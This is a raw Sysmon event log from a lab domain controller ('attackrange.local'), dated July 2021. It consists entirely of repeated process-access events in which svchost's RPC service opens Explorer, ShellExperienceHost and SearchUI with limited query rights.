07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:10.658{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 